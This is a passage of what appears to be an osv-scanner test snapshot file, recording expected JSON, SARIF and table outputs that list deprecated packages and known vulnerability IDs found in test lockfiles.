"ecosystem": "" } } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestCommand_Filter/Show_all_Packages_with_empty_config - 2] Scanned /testdata/locks-insecure/osv-scanner-with-unscannables.json file and found 2 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Filtered 1 local/unscannable package/s from the scan. --- [TestCommand_FlagDeprecatedPackages/package_deprecated_false_no_vuln_json - 1] { "results": [], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestCommand_FlagDeprecatedPackages/package_deprecated_false_no_vuln_json - 2] Scanning dir ./testdata/exp-plugins-pkgdeprecate/clean/Cargo.lock Scanned /testdata/exp-plugins-pkgdeprecate/clean/Cargo.lock file and found 5 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. --- [TestCommand_FlagDeprecatedPackages/package_deprecated_npm_json - 1] { "results": [ { "source": { "path": "/testdata/exp-plugins-pkgdeprecate/deprecated-npm/package-lock.json", "type": "lockfile" }, "packages": [ { "package": { "name": "left-pad", "version": "1.3.0", "ecosystem": "npm", "deprecated": true } } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestCommand_FlagDeprecatedPackages/package_deprecated_npm_json - 2] Scanning dir ./testdata/exp-plugins-pkgdeprecate/deprecated-npm/package-lock.json Scanned /testdata/exp-plugins-pkgdeprecate/deprecated-npm/package-lock.json file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. --- [TestCommand_FlagDeprecatedPackages/package_deprecated_true_no_vuln_json - 1] { "results": [ { "source": { "path": "/testdata/exp-plugins-pkgdeprecate/deprecated-novuln/Cargo.lock", "type": "lockfile" }, "packages": [ { "package": { "name": "url", "version": "2.5.3", "ecosystem": "crates.io", "deprecated": true } } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestCommand_FlagDeprecatedPackages/package_deprecated_true_no_vuln_json - 2] Scanning dir ./testdata/exp-plugins-pkgdeprecate/deprecated-novuln/Cargo.lock Scanned /testdata/exp-plugins-pkgdeprecate/deprecated-novuln/Cargo.lock file and found 36 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. --- [TestCommand_FlagDeprecatedPackages/package_deprecated_true_no_vuln_table - 1] Scanning dir ./testdata/exp-plugins-pkgdeprecate/deprecated-novuln/Cargo.lock Scanned /testdata/exp-plugins-pkgdeprecate/deprecated-novuln/Cargo.lock file and found 36 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. Total 1 package deprecated. +------------------------------------------------------------------------------------------------+ | Deprecated packages | +-----------+---------+---------+----------------------------------------------------------------+ | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-----------+---------+---------+----------------------------------------------------------------+ | crates.io | url | 2.5.3 | testdata/exp-plugins-pkgdeprecate/deprecated-novuln/Cargo.lock | +-----------+---------+---------+----------------------------------------------------------------+ --- [TestCommand_FlagDeprecatedPackages/package_deprecated_true_no_vuln_table - 2] --- [TestCommand_FlagDeprecatedPackages/package_deprecated_true_with_vuln_json - 1] { "results": [ { "source": { "path": "/testdata/exp-plugins-pkgdeprecate/deprecated-vuln/Cargo.lock", "type": "lockfile" }, "packages": [ { "package": { "name": "net2", "version": "0.2.33", "ecosystem": "crates.io", "deprecated": true }, "groups": 2, "vulnerabilities": [ "RUSTSEC-2020-0016", "RUSTSEC-2020-0078", "GHSA-458v-4hrf-g3m4", "GHSA-c79c-gwph-gqfm" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestCommand_FlagDeprecatedPackages/package_deprecated_true_with_vuln_json - 2] Scanning dir ./testdata/exp-plugins-pkgdeprecate/deprecated-vuln/Cargo.lock Scanned /testdata/exp-plugins-pkgdeprecate/deprecated-vuln/Cargo.lock file and found 7 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. --- [TestCommand_FlagDeprecatedPackages/package_deprecated_true_with_vuln_table - 1] Scanning dir ./testdata/exp-plugins-pkgdeprecate/deprecated-vuln/Cargo.lock Scanned /testdata/exp-plugins-pkgdeprecate/deprecated-vuln/Cargo.lock file and found 7 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 1 package affected by 2 known vulnerabilities (0 Critical, 0 High, 1 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 1 vulnerability can be fixed. +-------------------------------------+------+-----------+---------+---------+---------------+--------------------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+---------+---------+---------------+--------------------------------------------------------------+ | https://osv.dev/RUSTSEC-2020-0016 | | crates.io | net2 | 0.2.33 | -- | testdata/exp-plugins-pkgdeprecate/deprecated-vuln/Cargo.lock | | https://osv.dev/RUSTSEC-2020-0078 | 5.5 | crates.io | net2 | 0.2.33 | 0.2.36 | testdata/exp-plugins-pkgdeprecate/deprecated-vuln/Cargo.lock | | https://osv.dev/GHSA-458v-4hrf-g3m4 | | | | | | | | https://osv.dev/GHSA-c79c-gwph-gqfm | | | | | | | +-------------------------------------+------+-----------+---------+---------+---------------+--------------------------------------------------------------+ Total 1 package deprecated. +----------------------------------------------------------------------------------------------+ | Deprecated packages | +-----------+---------+---------+--------------------------------------------------------------+ | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-----------+---------+---------+--------------------------------------------------------------+ | crates.io | net2 | 0.2.33 | testdata/exp-plugins-pkgdeprecate/deprecated-vuln/Cargo.lock | +-----------+---------+---------+--------------------------------------------------------------+ --- [TestCommand_FlagDeprecatedPackages/package_deprecated_true_with_vuln_table - 2] --- [TestCommand_GithubActions/scanning_osv-scanner_custom_format - 1] Scanned /testdata/locks-insecure/osv-scanner-flutter-deps.json file and found 3 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 1 package affected by 2 known vulnerabilities (0 Critical, 2 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +--------------------------------+------+-----------+----------------------------+-----------------------------+---------------+-------------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +--------------------------------+------+-----------+----------------------------+-----------------------------+---------------+-------------------------------------------------------+ | https://osv.dev/CVE-2023-39137 | 7.8 | GIT | https://github.com/brendan-duncan/archive.git@9de7a054 | -- | testdata/locks-insecure/osv-scanner-flutter-deps.json | | https://osv.dev/CVE-2023-39139 | 7.8 | GIT | https://github.com/brendan-duncan/archive.git@9de7a054 | -- | testdata/locks-insecure/osv-scanner-flutter-deps.json | +--------------------------------+------+-----------+----------------------------------------------------------+---------------+-------------------------------------------------------+ --- [TestCommand_GithubActions/scanning_osv-scanner_custom_format - 2] --- [TestCommand_GithubActions/scanning_osv-scanner_custom_format_output_json - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "version": "2.1.0", "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///testdata/locks-insecure/osv-scanner-flutter-deps.json" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "/r/n", "/n" ], "policies": [], "redactionTokens": [], "results": [ { "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///testdata/locks-insecure/osv-scanner-flutter-deps.json" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'https://github.com/brendan-duncan/archive.git@9de7a054' is vulnerable to 'CVE-2023-39137' (also known as 'GHSA-r285-q736-9v95')." }, "rank": -1, "relatedLocations": [], "ruleId": "CVE-2023-39137", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///testdata/locks-insecure/osv-scanner-flutter-deps.json" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'https://github.com/brendan-duncan/archive.git@9de7a054' is vulnerable to 'CVE-2023-39139' (also known as 'GHSA-9v85-q87q-g4vg')." }, "rank": -1, "relatedLocations": [], "ruleId": "CVE-2023-39139", "ruleIndex": 1, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "CVE-2023-39137", "GHSA-r285-q736-9v95" ], "fullDescription": { "markdown": "An issue in Archive v3.3.7 allows attackers to spoof zip filenames which can lead to inconsistent filename parsing.", "text": "An issue in Archive v3.3.7 allows attackers to spoof zip filenames which can lead to inconsistent filename parsing." }, "help": { "markdown": "**Your dependency is vulnerable to [CVE-2023-39137](https://osv.dev/CVE-2023-39137)**.\n\n## [CVE-2023-39137](https://osv.dev/CVE-2023-39137)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e An issue in Archive v3.3.7 allows attackers to spoof zip filenames which can lead to inconsistent filename parsing.\n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/testdata/locks-insecure/osv-scanner-flutter-deps.json | https://github.com/brendan-duncan/archive.git | 9de7a0544457c6aba755ccb65abb41b0dc1db70d |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/testdata/locks-insecure/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"CVE-2023-39137\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [CVE-2023-39137](https://osv.dev/CVE-2023-39137)**.\n\n## [CVE-2023-39137](https://osv.dev/CVE-2023-39137)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e An issue in Archive v3.3.7 allows attackers to spoof zip filenames which can lead to inconsistent filename parsing.\n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/testdata/locks-insecure/osv-scanner-flutter-deps.json | https://github.com/brendan-duncan/archive.git | 9de7a0544457c6aba755ccb65abb41b0dc1db70d |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/testdata/locks-insecure/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"CVE-2023-39137\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "CVE-2023-39137", "name": "CVE-2023-39137", "properties": { "security-severity": "7.8" }, "relationships": [], "shortDescription": { "markdown": "CVE-2023-39137", "text": "CVE-2023-39137" } }, { "deprecatedIds": [ "CVE-2023-39139", "GHSA-9v85-q87q-g4vg" ], "fullDescription": { "markdown": "An issue in Archive v3.3.7 allows attackers to execute a path traversal via extracting a crafted zip file.", "text": "An issue in Archive v3.3.7 allows attackers to execute a path traversal via extracting a crafted zip file." }, "help": { "markdown": "**Your dependency is vulnerable to [CVE-2023-39139](https://osv.dev/CVE-2023-39139)**.\n\n## [CVE-2023-39139](https://osv.dev/CVE-2023-39139)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e An issue in Archive v3.3.7 allows attackers to execute a path traversal via extracting a crafted zip file.\n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/testdata/locks-insecure/osv-scanner-flutter-deps.json | https://github.com/brendan-duncan/archive.git | 9de7a0544457c6aba755ccb65abb41b0dc1db70d |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/testdata/locks-insecure/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"CVE-2023-39139\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [CVE-2023-39139](https://osv.dev/CVE-2023-39139)**.\n\n## [CVE-2023-39139](https://osv.dev/CVE-2023-39139)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e An issue in Archive v3.3.7 allows attackers to execute a path traversal via extracting a crafted zip file.\n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/testdata/locks-insecure/osv-scanner-flutter-deps.json | https://github.com/brendan-duncan/archive.git | 9de7a0544457c6aba755ccb65abb41b0dc1db70d |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/testdata/locks-insecure/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"CVE-2023-39139\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "CVE-2023-39139", "name": "CVE-2023-39139", "properties": { "security-severity": "7.8" }, "relationships": [], "shortDescription": { "markdown": "CVE-2023-39139", "text": "CVE-2023-39139" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "properties": {} } --- [TestCommand_GithubActions/scanning_osv-scanner_custom_format_output_json - 2] Scanned /testdata/locks-insecure/osv-scanner-flutter-deps.json file and found 3 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. --- [TestCommand_GithubActions/scanning_osv-scanner_custom_format_with_git_tag - 1] Scanned /testdata/locks-insecure/osv-scanner-custom-git-tag.json file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 1 package affected by 40 known vulnerabilities (5 Critical, 15 High, 20 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +--------------------------------+------+-----------+----------------------------+---------------+---------------+---------------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +--------------------------------+------+-----------+----------------------------+---------------+---------------+---------------------------------------------------------+ | https://osv.dev/CVE-2016-2177 | 9.8 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2016-2182 | 9.8 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2022-2274 | 9.8 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2022-3358 | 7.5 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2022-3996 | 7.5 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2022-4203 | 4.9 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2022-4304 | 5.9 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2022-4450 | 7.5 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2023-0215 | 7.5 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2023-0216 | 7.5 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2023-0217 | 7.5 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2023-0286 | 7.4 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2023-0401 | 7.5 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2023-0464 | 7.5 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2023-0465 | 5.3 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2023-0466 | 5.3 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2023-1255 | 5.9 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2023-2650 | 6.5 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2023-2975 | 5.3 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2023-3817 | 5.3 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2023-4807 | 7.8 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2023-5363 | 7.5 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2023-5678 | 5.3 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2023-6129 | 6.5 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2023-6237 | 5.9 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2024-13176 | 4.1 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2024-2511 | 5.9 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2024-4603 | 5.3 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2024-4741 | 7.5 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2024-5535 | 9.1 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2024-9143 | 4.3 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2025-15467 | 9.8 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2025-68160 | 4.7 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2025-69418 | 4.0 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2025-69419 | 7.4 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2025-69420 | 7.5 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2025-9230 | 7.5 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2025-9232 | 5.9 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2026-22795 | 5.5 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | | https://osv.dev/CVE-2026-22796 | 5.3 | GIT | github.com/openssl/openssl | openssl-3.0.4 | -- | testdata/locks-insecure/osv-scanner-custom-git-tag.json | +--------------------------------+------+-----------+----------------------------+---------------+---------------+---------------------------------------------------------+ --- [TestCommand_GithubActions/scanning_osv-scanner_custom_format_with_git_tag - 2] --- [TestCommand_HtmlFile - 1] --- [TestCommand_HtmlFile - 2] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml HTML output available at: /report.html --- [TestCommand_HtmlFile_Deprecated - 1] --- [TestCommand_HtmlFile_Deprecated - 2] Warning: --output has been deprecated in favor of --output-file Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml HTML output available at: /report.html --- [TestCommand_JavareachArchive/jars_can_be_scanned_with_call_analysis - 1] Scanning dir ./testdata/artifact/javareach_test.jar Java reachability enricher marked 14 packages as unreachable Scanned /testdata/artifact/javareach_test.jar file and found 21 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. failed to download package err jar not found: https://repo1.maven.org/maven2/com/example/hello-tester/1.0-SNAPSHOT/hello-tester-1.0-SNAPSHOT.jar Total 4 packages affected by 55 known vulnerabilities (18 Critical, 30 High, 5 Medium, 2 Low, 0 Unknown) from 1 ecosystem. 55 vulnerabilities can be fixed. +-------------------------------------+------+-----------+---------------------------------------------+------------------+---------------+--------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+---------------------------------------------+------------------+---------------+--------------------------------------+ | https://osv.dev/GHSA-72hv-8253-57qq | 8.7 | Maven | com.fasterxml.jackson.core:jackson-core | 2.14.0 | 2.18.6 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-h46c-h94j-95f3 | 8.7 | Maven | com.fasterxml.jackson.core:jackson-core | 2.14.0 | 2.15.0 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-288c-cq4h-88gq | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-4gq5-ch57-c2mg | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-4w82-r329-3q67 | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-57j2-w4cx-62h2 | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.12.6.1 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-5949-rw7g-wx7w | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-5r5r-6hpj-8gg9 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-5ww9-j83m-q7qx | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-645p-88qh-w398 | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-6fpp-rgj9-8rwc | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.6 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-85cw-hj65-qqv9 | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-89qr-369f-5m5x | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-8c4j-34r4-xr8g | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-8w26-6f25-cm9x | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-9gph-22xh-8x98 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-9m6f-7xcq-8vf8 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-c8hm-7hpq-7jhg | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-cf6r-3wgc-h863 | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-cggj-fvv3-cqwv | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-cjjf-94ff-43w7 | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-cmfg-87vq-g5g4 | 5.9 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-cvm9-fjm9-3572 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-f3j5-rmmp-3fc5 | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.8.11.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-f9xh-2qgp-cq57 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-fmmc-742q-jg75 | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-fqwf-pjwf-7vqv | 8.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-gjmw-vf9h-g25v | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind 